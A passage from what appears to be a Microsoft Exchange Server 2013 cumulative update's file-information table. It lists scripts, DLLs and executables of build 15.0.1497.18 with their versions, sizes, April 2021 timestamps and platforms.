\nGetvalidengines.ps1| Not applicable| 13,346| 27-Apr-21| 9:23| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,102| 27-Apr-21| 9:23| Not applicable \nImportedgeconfig.ps1| Not applicable| 77,324| 27-Apr-21| 9:23| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 36,514| 27-Apr-21| 9:23| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,874| 27-Apr-21| 9:23| Not applicable \nLpversioning.xml| Not applicable| 20,446| 27-Apr-21| 8:56| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 45,400| 27-Apr-21| 9:23| Not applicable \nMicrosoft.ceres.datalossprevention.dll.90160000_1164_0000_1000_1000000ff1ce| 16.0.1497.18| 873,976| 27-Apr-21| 8:53| Not applicable \nMicrosoft.dkm.proxy.dll| 15.0.1497.18| 32,712| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.addressbook.service.dll| 15.0.1497.18| 218,592| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.airsync.dll1| 15.0.1497.18| 1,676,272| 27-Apr-21| 9:00| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.0.1497.18| 59,376| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.anchorservice.dll| 15.0.1497.18| 137,688| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.0.1497.18| 27,632| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.approval.applications.dll| 15.0.1497.18| 53,208| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.assistants.dll| 15.0.1497.18| 339,416| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.0.1497.18| 70,616| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.authadminservicelet.dll| 15.0.1497.18| 36,336| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.0.1497.18| 15,856| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.autodiscover.dll| 15.0.1497.18| 360,384| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.autodiscoverv2.dll| 15.0.1497.18| 31,680| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.batchservice.dll| 15.0.1497.18| 33,224| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.0.1497.18| 26,584| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.0.1497.18| 23,512| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.clients.common.dll| 15.0.1497.18| 158,128| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.clients.owa.dll| 15.0.1497.18| 3,030,448| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.0.1497.18| 2,269,616| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.clients.security.dll| 15.0.1497.18| 156,080| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.0.1497.18| 22,472| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.0.1497.18| 2,698,696| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.0.1497.18| 107,968| 27-Apr-21| 8:57| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.0.1497.18| 287,688| 27-Apr-21| 8:57| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.0.1497.18| 462,784| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.0.1497.18| 55,744| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.common.dll| 15.0.1497.18| 157,632| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.common.inference.dll| 15.0.1497.18| 39,360| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.compliance.dll| 15.0.1497.18| 85,440| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.0.1497.18| 173,024| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.0.1497.18| 74,728| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.0.1497.18| 25,568| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.compression.dll| 15.0.1497.18| 17,856| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.0.1497.18| 37,840| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.core.dll| 15.0.1497.18| 111,080| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.0.1497.18| 53,712| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.0.1497.18| 24,008| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.failfast.dll| 15.0.1497.18| 55,248| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.0.1497.18| 1,455,048| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.0.1497.18| 71,632| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.0.1497.18| 21,472| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.connections.common.dll| 15.0.1497.18| 77,248| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.connections.eas.dll| 15.0.1497.18| 235,976| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.connections.imap.dll| 15.0.1497.18| 115,136| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.connections.pop.dll| 15.0.1497.18| 74,688| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.core.strings.dll| 15.0.1497.18| 599,488| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.0.1497.18| 1,271,816| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.data.directory.dll| 15.0.1497.18| 6,639,112| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.data.dll| 15.0.1497.18| 1,378,824| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.0.1497.18| 314,368| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.data.ha.dll| 15.0.1497.18| 82,416| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.0.1497.18| 108,016| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.mapi.dll| 15.0.1497.18| 175,112| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.0.1497.18| 31,240| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.metering.dll| 15.0.1497.18| 99,336| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.providers.dll| 15.0.1497.18| 141,320| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.0.1497.18| 143,856| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.storage.dll| 15.0.1497.18| 8,145,920| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.0.1497.18| 36,360| 27-Apr-21| 9:00| x86 \nMicrosoft.exchange.datacenterstrings.dll| 15.0.1497.18| 75,248| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.0.1497.18| 22,960| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.diagnostics.dll| 15.0.1497.18| 1,934,792| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.0.1497.18| 23,984| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.0.1497.18| 321,968| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.0.1497.18| 134,600| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.0.1497.18| 127,408| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.0.1497.18| 50,672| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.directory.topologyservice.exe| 15.0.1497.18| 192,992| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.dxstore.dll| 15.0.1497.18| 279,488| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.0.1497.18| 20,936| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.0.1497.18| 21,976| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.0.1497.18| 153,568| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.0.1497.18| 225,248| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.edgesyncsvc.exe| 15.0.1497.18| 98,256| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.0.1497.18| 1,126,376| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.0.1497.18| 1,126,376| 27-Apr-21| 8:58| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,506| 27-Apr-21| 10:02| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,550| 27-Apr-21| 9:57| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.0.1497.18| 295,904| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.0.1497.18| 56,296| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.0.1497.18| 208,360| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.common.dll| 15.0.1497.18| 155,104| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.0.1497.18| 137,184| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.0.1497.18| 35,296| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.entities.people.dll| 15.0.1497.18| 37,344| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.0.1497.18| 16,320| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.eserepl.dll| 15.0.1497.18| 118,728| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.0.1497.18| 37,360| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.0.1497.18| 560,104| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.0.1497.18| 15,840| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.0.1497.18| 76,784| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.0.1497.18| 571,848| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.0.1497.18| 42,944| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.helpprovider.dll| 15.0.1497.18| 39,400| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.0.1497.18| 31,152| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.0.1497.18| 95,664| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.0.1497.18| 35,272| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.0.1497.18| 17,856| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.0.1497.18| 21,424| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.0.1497.18| 35,248| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.0.1497.18| 63,920| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.0.1497.18| 27,056| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.httputilities.dll| 15.0.1497.18| 20,912| 27-Apr-21| 8:57| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.0.1497.18| 1,033,688| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.imap4.exe| 15.0.1497.18| 230,344| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.0.1497.18| 230,344| 27-Apr-21| 9:48| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.0.1497.18| 25,032| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.0.1497.18| 25,032| 27-Apr-21| 9:48| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.0.1497.18| 71,664| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.inference.mdbcommon.dll| 15.0.1497.18| 75,776| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.0.1497.18| 93,696| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.inference.pipeline.dll| 15.0.1497.18| 21,504| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.0.1497.18| 19,456| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.0.1497.18| 35,328| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.0.1497.18| 1,662,464| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.0.1497.18| 164,352| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.0.1497.18| 84,968| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.live.domainservices.dll| 15.0.1497.18| 122,328| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.0.1497.18| 20,400| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.0.1497.18| 18,888| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.loguploader.dll| 15.0.1497.18| 159,680| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.0.1497.18| 61,376| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.0.1497.18| 346,056| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.0.1497.18| 43,440| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxloadbalanceclient.dll| 15.0.1497.18| 24,520| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.0.1497.18| 1,523,632| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.0.1497.18| 639,432| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.0.1497.18| 106,416| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.0.1497.18| 61,872| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.0.1497.18| 91,592| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.0.1497.18| 42,416| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.0.1497.18| 121,776| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.0.1497.18| 148,424| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.0.1497.18| 82,352| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.0.1497.18| 72,624| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.0.1497.18| 120,264| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.upgrade14to15.dll| 15.0.1497.18| 276,400| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.0.1497.18| 140,248| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.0.1497.18| 517,080| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.0.1497.18| 191,960| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.0.1497.18| 38,888| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.0.1497.18| 6,405,552| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.0.1497.18| 286,136| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.0.1497.18| 96,728| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.deployment.dll| 15.0.1497.18| 614,896| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.0.1497.18| 70,040| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.dll| 15.0.1497.18| #########| 27-Apr-21| 8:59| x64 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.0.1497.18| 60,840| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.mobility.dll| 15.0.1497.18| 306,672| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.powershell.support.dll| 15.0.1497.18| 229,360| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.0.1497.18| 47,088| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.0.1497.18| 6,657,520| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.recipient.dll| 15.0.1497.18| 854,512| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.0.1497.18| 146,360| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.0.1497.18| 73,144| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.0.1497.18| 1,273,768| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.management.transport.dll| 15.0.1497.18| 764,376| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.managementgui.dll| 15.0.1497.18| 5,352,352| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.mapihttpclient.dll| 15.0.1497.18| 115,136| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.0.1497.18| 192,496| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.0.1497.18| 78,808| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.0.1497.18| 66,008| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.0.1497.18| 28,632| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.0.1497.18| 173,032| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.0.1497.18| 25,560| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.0.1497.18| 153,072| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.0.1497.18| 309,744| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.0.1497.18| 34,264| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.0.1497.18| 98,776| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.migration.dll| 15.0.1497.18| 962,024| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.migrationmonitor.dll| 15.0.1497.18| 144,880| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.0.1497.18| 139,240| 27-Apr-21| 8:55| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.0.1497.18| 3,922,952| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.0.1497.18| 20,480| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.net.dll| 15.0.1497.18| 4,034,488| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.notifications.broker.exe| 15.0.1497.18| 172,976| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.notifications.brokerapi.dll| 15.0.1497.18| 56,264| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.0.1497.18| 20,992| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.0.1497.18| 73,216| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.0.1497.18| 15,320| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.pop3.exe| 15.0.1497.18| 92,592| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.0.1497.18| 92,592| 27-Apr-21| 9:48| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.0.1497.18| 25,008| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.0.1497.18| 25,008| 27-Apr-21| 9:48| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.0.1497.18| 209,840| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.0.1497.18| 209,840| 27-Apr-21| 9:48| Not applicable \nMicrosoft.exchange.powersharp.management.dll| 15.0.1497.18| 4,177,904| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.0.1497.18| 261,560| 27-Apr-21| 8:59| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.0.1497.18| 41,400| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.0.1497.18| 29,144| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.0.1497.18| 134,104| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.0.1497.18| 406,488| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.provisioningagent.dll| 15.0.1497.18| 228,336| 27-Apr-21| 8:59| x64 \nMicrosoft.exchange.provisioningservicelet.dll| 15.0.1497.18| 80,880| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.pushnotifications.dll| 15.0.1497.18| 105,392| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.0.1497.18| 407,984| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.0.1497.18| 72,624| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpc.dll| 15.0.1497.18| 1,466,816| 27-Apr-21| 8:58| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.0.1497.18| 150,512| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.0.1497.18| 62,448| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.0.1497.18| 483,800| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.0.1497.18| 149,464| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.0.1497.18| 733,632| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.0.1497.18| 207,832| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.0.1497.18| 31,688| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.0.1497.18| 41,432| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.0.1497.18| 51,184| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.rules.common.dll| 15.0.1497.18| 137,144| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.0.1497.18| 20,464| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.search.core.dll| 15.0.1497.18| 290,248| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.search.engine.dll| 15.0.1497.18| 97,224| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.search.fast.dll| 15.0.1497.18| 329,160| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.search.mdb.dll| 15.0.1497.18| 175,048| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.search.query.dll| 15.0.1497.18| 95,176| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.search.service.exe| 15.0.1497.18| 29,104| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.security.dll| 15.0.1497.18| 804,352| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.0.1497.18| 19,968| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.0.1497.18| 216,024| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.0.1497.18| 413,168| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.0.1497.18| 190,960| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.0.1497.18| 95,704| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.0.1497.18| 82,904| 27-Apr-21| 8:59| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.0.1497.18| 67,032| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.0.1497.18| 82,392| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.0.1497.18| 190,936| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.0.1497.18| 822,744| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.0.1497.18| 426,992| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.0.1497.18| 48,088| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.0.1497.18| 561,112| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.0.1497.18| 784,880| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.0.1497.18| 30,680| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.0.1497.18| 118,744| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.0.1497.18| 738,288| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.0.1497.18| 93,144| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.0.1497.18| 34,776| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.servicehost.exe| 15.0.1497.18| 54,768| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.0.1497.18| 49,136| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.services.dll| 15.0.1497.18| 7,786,496| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.0.1497.18| 214,528| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.0.1497.18| 58,880| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.0.1497.18| 84,992| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.common.dll| 15.0.1497.18| 308,224| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.0.1497.18| 35,840| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.console.dll| 15.0.1497.18| 27,648| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.gui.dll| 15.0.1497.18| 120,832| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.setup.parser.dll| 15.0.1497.18| 54,272| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.0.1497.18| 22,976| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.sharedcache.exe| 15.0.1497.18| 56,808| 27-Apr-21| 8:55| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.0.1497.18| 29,632| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.sqm.dll| 15.0.1497.18| 48,064| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.store.service.exe| 15.0.1497.18| 25,048| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.store.worker.exe| 15.0.1497.18| 26,584| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.storedriver.dll| 15.0.1497.18| 77,272| 27-Apr-21| 8:59| x86 